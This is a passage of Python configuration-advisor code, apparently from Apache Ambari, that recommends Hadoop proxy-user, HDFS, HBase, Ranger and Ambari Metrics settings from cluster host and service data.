\",\".join(rmHostsNameList)\n if not yarn_user in users and yarn_user is not None:\n users[yarn_user] = {\"propertyHosts\" : rmHostsNames, \"config\" : \"yarn-env\", \"propertyName\" : \"yarn_user\"}\n\n\n if \"FALCON\" in servicesList:\n falconUser = None\n if \"falcon-env\" in services[\"configurations\"] and \"falcon_user\" in services[\"configurations\"][\"falcon-env\"][\"properties\"]:\n falconUser = services[\"configurations\"][\"falcon-env\"][\"properties\"][\"falcon_user\"]\n if not falconUser in users and falconUser is not None:\n users[falconUser] = {\"propertyHosts\" : \"*\",\"propertyGroups\" : \"*\", \"config\" : \"falcon-env\", \"propertyName\" : \"falcon_user\"}\n\n if \"SPARK\" in servicesList:\n livyUser = None\n if \"livy-env\" in services[\"configurations\"] and \"livy_user\" in services[\"configurations\"][\"livy-env\"][\"properties\"]:\n livyUser = services[\"configurations\"][\"livy-env\"][\"properties\"][\"livy_user\"]\n if not livyUser in users and livyUser is not None:\n users[livyUser] = {\"propertyHosts\" : \"*\",\"propertyGroups\" : \"*\", \"config\" : \"livy-env\", \"propertyName\" : \"livy_user\"}\n\n if \"SPARK2\" in servicesList:\n livyUser = None\n if \"livy2-env\" in services[\"configurations\"] and \"livy_user\" in services[\"configurations\"][\"livy2-env\"][\"properties\"]:\n livyUser = services[\"configurations\"][\"livy2-env\"][\"properties\"][\"livy_user\"]\n if not livyUser in users and livyUser is not None:\n users[livy2User] = {\"propertyHosts\" : \"*\",\"propertyGroups\" : \"*\", \"config\" : \"livy2-env\", \"propertyName\" : \"livy_user\"}\n\n putCoreSiteProperty = self.putProperty(configurations, \"core-site\", services)\n putCoreSitePropertyAttribute = self.putPropertyAttribute(configurations, \"core-site\")\n\n for user_name, user_properties in users.iteritems():\n if hive_user and hive_user == user_name:\n if \"propertyHosts\" in user_properties:\n services[\"forced-configurations\"].append({\"type\" : \"core-site\", \"name\" : \"hadoop.proxyuser.{0}.hosts\".format(hive_user)})\n # Add properties \"hadoop.proxyuser.*.hosts\", \"hadoop.proxyuser.*.groups\" to core-site for all users\n putCoreSiteProperty(\"hadoop.proxyuser.{0}.hosts\".format(user_name) , user_properties[\"propertyHosts\"])\n Logger.info(\"Updated hadoop.proxyuser.{0}.hosts as : {1}\".format(hive_user, user_properties[\"propertyHosts\"]))\n if \"propertyGroups\" in user_properties:\n putCoreSiteProperty(\"hadoop.proxyuser.{0}.groups\".format(user_name) , user_properties[\"propertyGroups\"])\n\n # Remove old properties if user was renamed\n userOldValue = getOldValue(self, services, user_properties[\"config\"], user_properties[\"propertyName\"])\n if userOldValue is not None and userOldValue != user_name:\n putCoreSitePropertyAttribute(\"hadoop.proxyuser.{0}.hosts\".format(userOldValue), 'delete', 'true')\n services[\"forced-configurations\"].append({\"type\" : \"core-site\", \"name\" : \"hadoop.proxyuser.{0}.hosts\".format(userOldValue)})\n services[\"forced-configurations\"].append({\"type\" : \"core-site\", \"name\" : \"hadoop.proxyuser.{0}.hosts\".format(user_name)})\n\n if \"propertyGroups\" in user_properties:\n putCoreSitePropertyAttribute(\"hadoop.proxyuser.{0}.groups\".format(userOldValue), 'delete', 'true')\n services[\"forced-configurations\"].append({\"type\" : \"core-site\", \"name\" : \"hadoop.proxyuser.{0}.groups\".format(userOldValue)})\n services[\"forced-configurations\"].append({\"type\" : \"core-site\", \"name\" : \"hadoop.proxyuser.{0}.groups\".format(user_name)})\n\n self.recommendAmbariProxyUsersForHDFS(services, servicesList, putCoreSiteProperty, putCoreSitePropertyAttribute)\n\n def recommendHDFSConfigurations(self, configurations, clusterData, services, hosts):\n putHDFSProperty = self.putProperty(configurations, \"hadoop-env\", services)\n putHDFSSiteProperty = self.putProperty(configurations, \"hdfs-site\", services)\n putHDFSSitePropertyAttributes = self.putPropertyAttribute(configurations, \"hdfs-site\")\n putHDFSProperty('namenode_heapsize', max(int(clusterData['totalAvailableRam'] / 2), 1024))\n putHDFSProperty = self.putProperty(configurations, \"hadoop-env\", services)\n putHDFSProperty('namenode_opt_newsize', max(int(clusterData['totalAvailableRam'] / 8), 128))\n putHDFSProperty = self.putProperty(configurations, \"hadoop-env\", services)\n putHDFSProperty('namenode_opt_maxnewsize', max(int(clusterData['totalAvailableRam'] / 8), 256))\n\n # Check if NN HA is enabled and recommend removing dfs.namenode.rpc-address\n hdfsSiteProperties = getServicesSiteProperties(services, \"hdfs-site\")\n nameServices = None\n if hdfsSiteProperties and 'dfs.internal.nameservices' in hdfsSiteProperties:\n nameServices = hdfsSiteProperties['dfs.internal.nameservices']\n if nameServices is None and hdfsSiteProperties and 'dfs.nameservices' in hdfsSiteProperties:\n nameServices = hdfsSiteProperties['dfs.nameservices']\n if nameServices and \"dfs.ha.namenodes.%s\" % nameServices in hdfsSiteProperties:\n namenodes = hdfsSiteProperties[\"dfs.ha.namenodes.%s\" % nameServices]\n if len(namenodes.split(',')) > 1:\n putHDFSSitePropertyAttributes(\"dfs.namenode.rpc-address\", \"delete\", \"true\")\n\n #Initialize default 'dfs.datanode.data.dir' if needed\n if (not hdfsSiteProperties) or ('dfs.datanode.data.dir' not in hdfsSiteProperties):\n dataDirs = '/hadoop/hdfs/data'\n putHDFSSiteProperty('dfs.datanode.data.dir', dataDirs)\n else:\n dataDirs = hdfsSiteProperties['dfs.datanode.data.dir'].split(\",\")\n\n # dfs.datanode.du.reserved should be set to 10-15% of volume size\n # For each host selects maximum size of the volume. Then gets minimum for all hosts.\n # This ensures that each host will have at least one data dir with available space.\n reservedSizeRecommendation = 0l #kBytes\n for host in hosts[\"items\"]:\n mountPoints = []\n mountPointDiskAvailableSpace = [] #kBytes\n for diskInfo in host[\"Hosts\"][\"disk_info\"]:\n mountPoints.append(diskInfo[\"mountpoint\"])\n mountPointDiskAvailableSpace.append(long(diskInfo[\"size\"]))\n\n maxFreeVolumeSizeForHost = 0l #kBytes\n for dataDir in dataDirs:\n mp = getMountPointForDir(dataDir, mountPoints)\n for i in range(len(mountPoints)):\n if mp == mountPoints[i]:\n if mountPointDiskAvailableSpace[i] > maxFreeVolumeSizeForHost:\n maxFreeVolumeSizeForHost = mountPointDiskAvailableSpace[i]\n\n if not reservedSizeRecommendation or maxFreeVolumeSizeForHost and maxFreeVolumeSizeForHost < reservedSizeRecommendation:\n reservedSizeRecommendation = maxFreeVolumeSizeForHost\n\n if reservedSizeRecommendation:\n reservedSizeRecommendation = max(reservedSizeRecommendation * 1024 / 8, 1073741824) # At least 1Gb is reserved\n putHDFSSiteProperty('dfs.datanode.du.reserved', reservedSizeRecommendation) #Bytes\n\n # recommendations for \"hadoop.proxyuser.*.hosts\", \"hadoop.proxyuser.*.groups\" properties in core-site\n self.recommendHadoopProxyUsers(configurations, services, hosts)\n\n def recommendHbaseConfigurations(self, configurations, clusterData, services, hosts):\n # recommendations for HBase env config\n\n # If cluster size is < 100, hbase master heap = 2G\n # else If cluster size is < 500, hbase master heap = 4G\n # else hbase master heap = 8G\n # for small test clusters use 1 gb\n hostsCount = 0\n if hosts and \"items\" in hosts:\n hostsCount = len(hosts[\"items\"])\n\n hbaseMasterRam = {\n hostsCount < 20: 1,\n 20 <= hostsCount < 100: 2,\n 100 <= hostsCount < 500: 4,\n 500 <= hostsCount: 8\n }[True]\n\n putHbaseProperty = self.putProperty(configurations, \"hbase-env\", services)\n putHbaseProperty('hbase_regionserver_heapsize', int(clusterData['hbaseRam']) * 1024)\n putHbaseProperty('hbase_master_heapsize', hbaseMasterRam * 1024)\n\n # recommendations for HBase site config\n putHbaseSiteProperty = self.putProperty(configurations, \"hbase-site\", services)\n\n if 'hbase-site' in services['configurations'] and 'hbase.superuser' in services['configurations']['hbase-site']['properties'] \\\n and 'hbase-env' in services['configurations'] and 'hbase_user' in services['configurations']['hbase-env']['properties'] \\\n and services['configurations']['hbase-env']['properties']['hbase_user'] != services['configurations']['hbase-site']['properties']['hbase.superuser']:\n putHbaseSiteProperty(\"hbase.superuser\", services['configurations']['hbase-env']['properties']['hbase_user'])\n\n\n def recommendRangerConfigurations(self, configurations, clusterData, services, hosts):\n\n putRangerAdminProperty = self.putProperty(configurations, \"admin-properties\", services)\n\n # Build policymgr_external_url\n protocol = 'http'\n ranger_admin_host = 'localhost'\n port = '6080'\n\n # Check if http is disabled. For HDP-2.3 this can be checked in ranger-admin-site/ranger.service.http.enabled\n # For Ranger-0.4.0 this can be checked in ranger-site/http.enabled\n if ('ranger-site' in services['configurations'] and 'http.enabled' in services['configurations']['ranger-site']['properties'] \\\n and services['configurations']['ranger-site']['properties']['http.enabled'].lower() == 'false') or \\\n ('ranger-admin-site' in services['configurations'] and 'ranger.service.http.enabled' in services['configurations']['ranger-admin-site']['properties'] \\\n and services['configurations']['ranger-admin-site']['properties']['ranger.service.http.enabled'].lower() == 'false'):\n # HTTPS protocol is used\n protocol = 'https'\n # Starting Ranger-0.5.0.2.3 port stored in ranger-admin-site ranger.service.https.port\n if 'ranger-admin-site' in services['configurations'] and \\\n 'ranger.service.https.port' in services['configurations']['ranger-admin-site']['properties']:\n port = services['configurations']['ranger-admin-site']['properties']['ranger.service.https.port']\n # In Ranger-0.4.0 port stored in ranger-site https.service.port\n elif 'ranger-site' in services['configurations'] and \\\n 'https.service.port' in services['configurations']['ranger-site']['properties']:\n port = services['configurations']['ranger-site']['properties']['https.service.port']\n else:\n # HTTP protocol is used\n # Starting Ranger-0.5.0.2.3 port stored in ranger-admin-site ranger.service.http.port\n if 'ranger-admin-site' in services['configurations'] and \\\n 'ranger.service.http.port' in services['configurations']['ranger-admin-site']['properties']:\n port = services['configurations']['ranger-admin-site']['properties']['ranger.service.http.port']\n # In Ranger-0.4.0 port stored in ranger-site http.service.port\n elif 'ranger-site' in services['configurations'] and \\\n 'http.service.port' in services['configurations']['ranger-site']['properties']:\n port = services['configurations']['ranger-site']['properties']['http.service.port']\n\n ranger_admin_hosts = self.getComponentHostNames(services, \"RANGER\", \"RANGER_ADMIN\")\n if ranger_admin_hosts:\n if len(ranger_admin_hosts) > 1 \\\n and services['configurations'] \\\n and 'admin-properties' in services['configurations'] and 'policymgr_external_url' in services['configurations']['admin-properties']['properties'] \\\n and services['configurations']['admin-properties']['properties']['policymgr_external_url'] \\\n and services['configurations']['admin-properties']['properties']['policymgr_external_url'].strip():\n\n # in case of HA deployment keep the policymgr_external_url specified in the config\n policymgr_external_url = services['configurations']['admin-properties']['properties']['policymgr_external_url']\n else:\n\n ranger_admin_host = ranger_admin_hosts[0]\n policymgr_external_url = \"%s://%s:%s\" % (protocol, ranger_admin_host, port)\n\n putRangerAdminProperty('policymgr_external_url', policymgr_external_url)\n\n rangerServiceVersion = [service['StackServices']['service_version'] for service in services[\"services\"] if service['StackServices']['service_name'] == 'RANGER'][0]\n if rangerServiceVersion == '0.4.0':\n # Recommend ldap settings based on ambari.properties configuration\n # If 'ambari.ldap.isConfigured' == true\n # For Ranger version 0.4.0\n if 'ambari-server-properties' in services and \\\n 'ambari.ldap.isConfigured' in services['ambari-server-properties'] and \\\n services['ambari-server-properties']['ambari.ldap.isConfigured'].lower() == \"true\":\n putUserSyncProperty = self.putProperty(configurations, \"usersync-properties\", services)\n serverProperties = services['ambari-server-properties']\n if 'authentication.ldap.managerDn' in serverProperties:\n putUserSyncProperty('SYNC_LDAP_BIND_DN', serverProperties['authentication.ldap.managerDn'])\n if 'authentication.ldap.primaryUrl' in serverProperties:\n ldap_protocol = 'ldap://'\n if 'authentication.ldap.useSSL' in serverProperties and serverProperties['authentication.ldap.useSSL'] == 'true':\n ldap_protocol = 'ldaps://'\n ldapUrl = ldap_protocol + serverProperties['authentication.ldap.primaryUrl'] if serverProperties['authentication.ldap.primaryUrl'] else serverProperties['authentication.ldap.primaryUrl']\n putUserSyncProperty('SYNC_LDAP_URL', ldapUrl)\n if 'authentication.ldap.userObjectClass' in serverProperties:\n putUserSyncProperty('SYNC_LDAP_USER_OBJECT_CLASS', serverProperties['authentication.ldap.userObjectClass'])\n if 'authentication.ldap.usernameAttribute' in serverProperties:\n putUserSyncProperty('SYNC_LDAP_USER_NAME_ATTRIBUTE', serverProperties['authentication.ldap.usernameAttribute'])\n\n\n # Set Ranger Admin Authentication method\n if 'admin-properties' in services['configurations'] and 'usersync-properties' in services['configurations'] and \\\n 'SYNC_SOURCE' in services['configurations']['usersync-properties']['properties']:\n rangerUserSyncSource = services['configurations']['usersync-properties']['properties']['SYNC_SOURCE']\n authenticationMethod = rangerUserSyncSource.upper()\n if authenticationMethod != 'FILE':\n putRangerAdminProperty('authentication_method', authenticationMethod)\n\n # Recommend xasecure.audit.destination.hdfs.dir\n # For Ranger version 0.4.0\n servicesList = [service[\"StackServices\"][\"service_name\"] for service in services[\"services\"]]\n putRangerEnvProperty = self.putProperty(configurations, \"ranger-env\", services)\n include_hdfs = \"HDFS\" in servicesList\n if include_hdfs:\n if 'core-site' in services['configurations'] and ('fs.defaultFS' in services['configurations']['core-site']['properties']):\n default_fs = services['configurations']['core-site']['properties']['fs.defaultFS']\n default_fs += '/ranger/audit/%app-type%/%time:yyyyMMdd%'\n putRangerEnvProperty('xasecure.audit.destination.hdfs.dir', default_fs)\n\n # Recommend Ranger Audit properties for ranger supported services\n # For Ranger version 0.4.0\n ranger_services = [\n {'service_name': 'HDFS', 'audit_file': 'ranger-hdfs-plugin-properties'},\n {'service_name': 'HBASE', 'audit_file': 'ranger-hbase-plugin-properties'},\n {'service_name': 'HIVE', 'audit_file': 'ranger-hive-plugin-properties'},\n {'service_name': 'KNOX', 'audit_file': 'ranger-knox-plugin-properties'},\n {'service_name': 'STORM', 'audit_file': 'ranger-storm-plugin-properties'}\n ]\n\n for item in range(len(ranger_services)):\n if ranger_services[item]['service_name'] in servicesList:\n component_audit_file = ranger_services[item]['audit_file']\n if component_audit_file in services[\"configurations\"]:\n ranger_audit_dict = [\n {'filename': 'ranger-env', 'configname': 'xasecure.audit.destination.db', 'target_configname': 'XAAUDIT.DB.IS_ENABLED'},\n {'filename': 'ranger-env', 'configname': 'xasecure.audit.destination.hdfs', 'target_configname': 'XAAUDIT.HDFS.IS_ENABLED'},\n {'filename': 'ranger-env', 'configname': 'xasecure.audit.destination.hdfs.dir', 'target_configname': 'XAAUDIT.HDFS.DESTINATION_DIRECTORY'}\n ]\n putRangerAuditProperty = self.putProperty(configurations, component_audit_file, services)\n\n for item in ranger_audit_dict:\n if item['filename'] in services[\"configurations\"] and item['configname'] in services[\"configurations\"][item['filename']][\"properties\"]:\n if item['filename'] in configurations and item['configname'] in configurations[item['filename']][\"properties\"]:\n rangerAuditProperty = configurations[item['filename']][\"properties\"][item['configname']]\n else:\n rangerAuditProperty = services[\"configurations\"][item['filename']][\"properties\"][item['configname']]\n putRangerAuditProperty(item['target_configname'], rangerAuditProperty)\n\n\n def getAmsMemoryRecommendation(self, services, hosts):\n # MB per sink in hbase heapsize\n HEAP_PER_MASTER_COMPONENT = 50\n HEAP_PER_SLAVE_COMPONENT = 10\n\n schMemoryMap = {\n \"HDFS\": {\n \"NAMENODE\": HEAP_PER_MASTER_COMPONENT,\n \"DATANODE\": HEAP_PER_SLAVE_COMPONENT\n },\n \"YARN\": {\n \"RESOURCEMANAGER\": HEAP_PER_MASTER_COMPONENT,\n },\n \"HBASE\": {\n \"HBASE_MASTER\": HEAP_PER_MASTER_COMPONENT,\n \"HBASE_REGIONSERVER\": HEAP_PER_SLAVE_COMPONENT\n },\n \"ACCUMULO\": {\n \"ACCUMULO_MASTER\": HEAP_PER_MASTER_COMPONENT,\n \"ACCUMULO_TSERVER\": HEAP_PER_SLAVE_COMPONENT\n },\n \"KAFKA\": {\n \"KAFKA_BROKER\": HEAP_PER_MASTER_COMPONENT\n },\n \"FLUME\": {\n \"FLUME_HANDLER\": HEAP_PER_SLAVE_COMPONENT\n },\n \"STORM\": {\n \"NIMBUS\": HEAP_PER_MASTER_COMPONENT,\n },\n \"AMBARI_METRICS\": {\n \"METRICS_COLLECTOR\": HEAP_PER_MASTER_COMPONENT,\n \"METRICS_MONITOR\": HEAP_PER_SLAVE_COMPONENT\n }\n }\n total_sinks_count = 0\n # minimum heap size\n hbase_heapsize = 500\n for serviceName, componentsDict in schMemoryMap.items():\n for componentName, multiplier in componentsDict.items():\n schCount = len(\n self.getHostsWithComponent(serviceName, componentName, services,\n hosts))\n hbase_heapsize += int((schCount * multiplier) ** 0.9)\n total_sinks_count += schCount\n collector_heapsize = int(hbase_heapsize/4 if hbase_heapsize > 2048 else 512)\n\n return round_to_n(collector_heapsize), round_to_n(hbase_heapsize), total_sinks_count\n\n def recommendStormConfigurations(self, configurations, clusterData, services, hosts):\n putStormSiteProperty = self.putProperty(configurations, \"storm-site\", services)\n servicesList = [service[\"StackServices\"][\"service_name\"] for service in services[\"services\"]]\n # Storm AMS integration\n if 'AMBARI_METRICS' in servicesList:\n putStormSiteProperty('metrics.reporter.register', 'org.apache.hadoop.metrics2.sink.storm.StormTimelineMetricsReporter')\n\n def recommendAmsConfigurations(self, configurations, clusterData, services, hosts):\n putAmsEnvProperty = self.putProperty(configurations, \"ams-env\", services)\n putAmsHbaseSiteProperty = self.putProperty(configurations, \"ams-hbase-site\", services)\n putAmsSiteProperty = self.putProperty(configurations, \"ams-site\", services)\n putHbaseEnvProperty = self.putProperty(configurations, \"ams-hbase-env\", services)\n putGrafanaProperty = self.putProperty(configurations, \"ams-grafana-env\", services)\n putGrafanaPropertyAttribute = self.putPropertyAttribute(configurations, \"ams-grafana-env\")\n\n amsCollectorHosts = self.getComponentHostNames(services, \"AMBARI_METRICS\", \"METRICS_COLLECTOR\")\n\n if 'cluster-env' in services['configurations'] and \\\n 'metrics_collector_vip_host' in services['configurations']['cluster-env']['properties']:\n metric_collector_host = services['configurations']['cluster-env']['properties']['metrics_collector_vip_host']\n else:\n metric_collector_host = 'localhost' if len(amsCollectorHosts) == 0 else amsCollectorHosts[0]\n\n putAmsSiteProperty(\"timeline.metrics.service.webapp.address\", str(metric_collector_host) + \":6188\")\n\n log_dir = \"/var/log/ambari-metrics-collector\"\n if \"ams-env\" in services[\"configurations\"]:\n if \"metrics_collector_log_dir\" in services[\"configurations\"][\"ams-env\"][\"properties\"]:\n log_dir = services[\"configurations\"][\"ams-env\"][\"properties\"][\"metrics_collector_log_dir\"]\n putHbaseEnvProperty(\"hbase_log_dir\", log_dir)\n\n defaultFs = 'file:///'\n if \"core-site\" in services[\"configurations\"] and \\\n \"fs.defaultFS\" in services[\"configurations\"][\"core-site\"][\"properties\"]:\n defaultFs = services[\"configurations\"][\"core-site\"][\"properties\"][\"fs.defaultFS\"]\n\n operatingMode = \"embedded\"\n if \"ams-site\" in services[\"configurations\"]:\n if \"timeline.metrics.service.operation.mode\" in services[\"configurations\"][\"ams-site\"][\"properties\"]:\n operatingMode = services[\"configurations\"][\"ams-site\"][\"properties\"][\"timeline.metrics.service.operation.mode\"]\n\n if operatingMode == \"distributed\":\n putAmsSiteProperty(\"timeline.metrics.service.watcher.disabled\", 'true')\n putAmsHbaseSiteProperty(\"hbase.cluster.distributed\", 'true')\n else:\n putAmsSiteProperty(\"timeline.metrics.service.watcher.disabled\", 'false')\n putAmsHbaseSiteProperty(\"hbase.cluster.distributed\", 'false')\n\n rootDir = \"file:///var/lib/ambari-metrics-collector/hbase\"\n tmpDir = \"/var/lib/ambari-metrics-collector/hbase-tmp\"\n zk_port_default = []\n if \"ams-hbase-site\" in services[\"configurations\"]:\n if \"hbase.rootdir\" in services[\"configurations\"][\"ams-hbase-site\"][\"properties\"]:\n rootDir = services[\"configurations\"][\"ams-hbase-site\"][\"properties\"][\"hbase.rootdir\"]\n if \"hbase.tmp.dir\" in services[\"configurations\"][\"ams-hbase-site\"][\"properties\"]:\n tmpDir = services[\"configurations\"][\"ams-hbase-site\"][\"properties\"][\"hbase.tmp.dir\"]\n if \"hbase.zookeeper.property.clientPort\" in services[\"configurations\"][\"ams-hbase-site\"][\"properties\"]:\n zk_port_default = services[\"configurations\"][\"ams-hbase-site\"][\"properties\"][\"hbase.zookeeper.property.clientPort\"]\n\n # Skip recommendation item if default value is present\n if operatingMode == \"distributed\" and not \"{{zookeeper_clientPort}}\" in zk_port_default:\n zkPort = self.getZKPort(services)\n putAmsHbaseSiteProperty(\"hbase.zookeeper.property.clientPort\", zkPort)\n elif operatingMode == \"embedded\" and not \"{{zookeeper_clientPort}}\" in zk_port_default:\n putAmsHbaseSiteProperty(\"hbase.zookeeper.property.clientPort\", \"61181\")\n\n mountpoints = [\"/\"]\n for collectorHostName in amsCollectorHosts:\n for host in hosts[\"items\"]:\n if host[\"Hosts\"][\"host_name\"] == collectorHostName:\n mountpoints = self.getPreferredMountPoints(host[\"Hosts\"])\n break\n isLocalRootDir = rootDir.startswith(\"file://\") or (defaultFs.startswith(\"file://\") and rootDir.startswith(\"/\"))\n if isLocalRootDir:\n rootDir = re.sub(\"^file:///|/\", \"\", rootDir, count=1)\n rootDir = \"file://\" + os.path.join(mountpoints[0], rootDir)\n tmpDir = re.sub(\"^file:///|/\", \"\", tmpDir, count=1)\n if len(mountpoints) > 1 and isLocalRootDir:\n tmpDir = os.path.join(mountpoints[1], tmpDir)\n else:\n tmpDir = os.path.join(mountpoints[0], tmpDir)\n putAmsHbaseSiteProperty(\"hbase.tmp.dir\", tmpDir)\n\n if operatingMode == \"distributed\":\n putAmsHbaseSiteProperty(\"hbase.rootdir\", defaultFs + \"/user/ams/hbase\")\n\n if operatingMode == \"embedded\":\n if isLocalRootDir:\n putAmsHbaseSiteProperty(\"hbase.rootdir\", rootDir)\n else:\n putAmsHbaseSiteProperty(\"hbase.rootdir\", \"file:///var/lib/ambari-metrics-collector/hbase\")\n\n collector_heapsize, hbase_heapsize, total_sinks_count = self.getAmsMemoryRecommendation(services, hosts)\n\n putAmsEnvProperty(\"metrics_collector_heapsize\", collector_heapsize)\n\n # blockCache = 0.3, memstore = 0.35, phoenix-server = 0.15, phoenix-client = 0.25\n putAmsHbaseSiteProperty(\"hfile.block.cache.size\", 0.3)\n putAmsHbaseSiteProperty(\"hbase.hregion.memstore.flush.size\", 134217728)\n putAmsHbaseSiteProperty(\"hbase.regionserver.global.memstore.upperLimit\", 0.35)\n putAmsHbaseSiteProperty(\"hbase.regionserver.global.memstore.lowerLimit\", 0.3)\n\n if len(amsCollectorHosts) > 1:\n pass\n else:\n # blockCache = 0.3, memstore = 0.3, phoenix-server = 0.2, phoenix-client = 0.3\n if total_sinks_count >= 2000:\n putAmsHbaseSiteProperty(\"hbase.regionserver.handler.count\", 60)\n putAmsHbaseSiteProperty(\"hbase.regionserver.hlog.blocksize\", 134217728)\n putAmsHbaseSiteProperty(\"hbase.regionserver.maxlogs\", 64)\n putAmsHbaseSiteProperty(\"hbase.hregion.memstore.flush.size\", 268435456)\n putAmsHbaseSiteProperty(\"hbase.regionserver.global.memstore.upperLimit\", 0.3)\n putAmsHbaseSiteProperty(\"hbase.regionserver.global.memstore.lowerLimit\", 0.25)\n putAmsHbaseSiteProperty(\"phoenix.query.maxGlobalMemoryPercentage\", 20)\n putAmsHbaseSiteProperty(\"phoenix.coprocessor.maxMetaDataCacheSize\", 81920000)\n putAmsSiteProperty(\"phoenix.query.maxGlobalMemoryPercentage\", 30)\n putAmsSiteProperty(\"timeline.metrics.service.resultset.fetchSize\", 10000)\n elif total_sinks_count >= 500:\n putAmsHbaseSiteProperty(\"hbase.regionserver.handler.count\", 60)\n putAmsHbaseSiteProperty(\"hbase.regionserver.hlog.blocksize\", 134217728)\n putAmsHbaseSiteProperty(\"hbase.regionserver.maxlogs\", 64)\n putAmsHbaseSiteProperty(\"hbase.hregion.memstore.flush.size\", 268435456)\n putAmsHbaseSiteProperty(\"phoenix.coprocessor.maxMetaDataCacheSize\", 40960000)\n putAmsSiteProperty(\"timeline.metrics.service.resultset.fetchSize\", 5000)\n else:\n putAmsHbaseSiteProperty(\"phoenix.coprocessor.maxMetaDataCacheSize\", 20480000)\n pass\n\n metrics_api_handlers = min(50, max(20, int(total_sinks_count / 100)))\n putAmsSiteProperty(\"timeline.metrics.service.handler.thread.count\", metrics_api_handlers)\n\n # Distributed mode heap size\n if operatingMode == \"distributed\":\n hbase_heapsize = max(hbase_heapsize, 768)\n putHbaseEnvProperty(\"hbase_master_heapsize\", \"512\")\n putHbaseEnvProperty(\"hbase_master_xmn_size\", \"102\") #20% of 512 heap size\n putHbaseEnvProperty(\"hbase_regionserver_heapsize\", hbase_heapsize)\n putHbaseEnvProperty(\"regionserver_xmn_size\", round_to_n(0.15*hbase_heapsize,64))\n else:\n # Embedded mode heap size : master + regionserver\n hbase_rs_heapsize = 768\n putHbaseEnvProperty(\"hbase_regionserver_heapsize\", hbase_rs_heapsize)\n putHbaseEnvProperty(\"hbase_master_heapsize\", hbase_heapsize)\n putHbaseEnvProperty(\"hbase_master_xmn_size\", round_to_n(0.15*(hbase_heapsize+hbase_rs_heapsize),64))\n\n # If no local DN in distributed mode\n if operatingMode == \"distributed\":\n dn_hosts = self.getComponentHostNames(services, \"HDFS\", \"DATANODE\")\n # call by Kerberos wizard sends only the service being affected\n # so it is possible for dn_hosts to be None but not amsCollectorHosts\n if dn_hosts and len(dn_hosts) > 0:\n if set(amsCollectorHosts).intersection(dn_hosts):\n collector_cohosted_with_dn = \"true\"\n else:\n collector_cohosted_with_dn = \"false\"\n putAmsHbaseSiteProperty(\"dfs.client.read.shortcircuit\", collector_cohosted_with_dn)\n\n #split points\n scriptDir = os.path.dirname(os.path.abspath(__file__))\n metricsDir = os.path.join(scriptDir, '../../../../common-services/AMBARI_METRICS/0.1.0/package')\n serviceMetricsDir = os.path.join(metricsDir, 'files', 'service-metrics')\n sys.path.append(os.path.join(metricsDir, 'scripts'))\n servicesList = [service[\"StackServices\"][\"service_name\"] for service in services[\"services\"]]\n\n from split_points import FindSplitPointsForAMSRegions\n\n ams_hbase_site = None\n ams_hbase_env = None\n\n # Overriden properties form the UI\n if \"ams-hbase-site\" in services[\"configurations\"]:\n ams_hbase_site = services[\"configurations\"][\"ams-hbase-site\"][\"properties\"]\n if \"ams-hbase-env\" in services[\"configurations\"]:\n ams_hbase_env = services[\"configurations\"][\"ams-hbase-env\"][\"properties\"]\n\n # Recommendations\n if not ams_hbase_site:\n ams_hbase_site = configurations[\"ams-hbase-site\"][\"properties\"]\n if not ams_hbase_env:\n ams_hbase_env = configurations[\"ams-hbase-env\"][\"properties\"]\n\n split_point_finder = FindSplitPointsForAMSRegions(\n ams_hbase_site, ams_hbase_env, serviceMetricsDir, operatingMode, servicesList)\n\n result = split_point_finder.get_split_points()\n precision_splits = ' '\n aggregate_splits = ' '\n if result.precision:\n precision_splits = result.precision\n if result.aggregate:\n aggregate_splits = result.aggregate\n putAmsSiteProperty(\"timeline.metrics.host.aggregate.splitpoints\", ','.join(precision_splits))\n putAmsSiteProperty(\"timeline.metrics.cluster.aggregate.splitpoints\", ','.join(aggregate_splits))\n\n component_grafana_exists = False\n for service in services['services']:\n if 'components' in service:\n for component in service['components']:\n if 'StackServiceComponents' in component:\n # If Grafana is installed the hostnames would indicate its location\n if 'METRICS_GRAFANA' in component['StackServiceComponents']['component_name'] and\\\n len(component['StackServiceComponents']['hostnames']) != 0:\n component_grafana_exists = True\n break\n pass\n\n if not component_grafana_exists:\n putGrafanaPropertyAttribute(\"metrics_grafana_password\", \"visible\", \"false\")\n\n pass\n\n def getHostNamesWithComponent(self, serviceName, componentName, services):\n \"\"\"\n Returns the list of hostnames on which service component is installed\n \"\"\"\n if services is not None and serviceName in [service[\"StackServices\"][\"service_name\"] for service in services[\"services\"]]:\n service = [serviceEntry for serviceEntry in services[\"services\"] if serviceEntry[\"StackServices\"][\"service_name\"] == serviceName][0]\n components = [componentEntry for componentEntry in service[\"components\"] if componentEntry[\"StackServiceComponents\"][\"component_name\"] == componentName]\n if (len(components) > 0 and len(components[0][\"StackServiceComponents\"][\"hostnames\"]) > 0):\n componentHostnames = components[0][\"StackServiceComponents\"][\"hostnames\"]\n return componentHostnames\n return []\n\n def getHostsWithComponent(self, serviceName, componentName, services, hosts):\n if services is not None and hosts is not None and serviceName in [service[\"StackServices\"][\"service_name\"] for service in services[\"services\"]]:\n service = [serviceEntry for serviceEntry in services[\"services\"] if serviceEntry[\"StackServices\"][\"service_name\"] == serviceName][0]\n components = [componentEntry for componentEntry in service[\"components\"] if componentEntry[\"StackServiceComponents\"][\"component_name\"] == componentName]\n if (len(components) > 0 and len(components[0][\"StackServiceComponents\"][\"hostnames\"]) > 0):\n componentHostnames = components[0][\"StackServiceComponents\"][\"hostnames\"]\n componentHosts = [host for host in hosts[\"items\"] if host[\"Hosts\"][\"host_name\"] in componentHostnames]\n return componentHosts\n return []\n\n def getHostWithComponent(self, serviceName, componentName, services, hosts):\n componentHosts = self.getHostsWithComponent(serviceName, componentName, services, hosts)\n if (len(componentHosts) > 0):\n return componentHosts[0]\n return None\n\n def getHostComponentsByCategories(self, hostname, categories, services, hosts):\n components = []\n if services is not None and hosts is not None:\n for service in services[\"services\"]:\n components.extend([componentEntry for componentEntry in service[\"components\"]\n if componentEntry[\"StackServiceComponents\"][\"component_category\"] in categories\n and hostname in componentEntry[\"StackServiceComponents\"][\"hostnames\"]])\n return components\n\n def getZKHostPortString(self, services, include_port=True):\n \"\"\"\n Returns the comma delimited string of zookeeper server host with the configure port installed in a cluster\n Example: zk.host1.org:2181,zk.host2.org:2181,zk.host3.org:2181\n include_port boolean param -> If port is also needed.\n \"\"\"\n servicesList = [service[\"StackServices\"][\"service_name\"] for service in services[\"services\"]]\n include_zookeeper = \"ZOOKEEPER\" in servicesList\n zookeeper_host_port = ''\n\n if include_zookeeper:\n zookeeper_hosts = self.getHostNamesWithComponent(\"ZOOKEEPER\", \"ZOOKEEPER_SERVER\", services)\n zookeeper_host_port_arr = []\n\n if include_port:\n 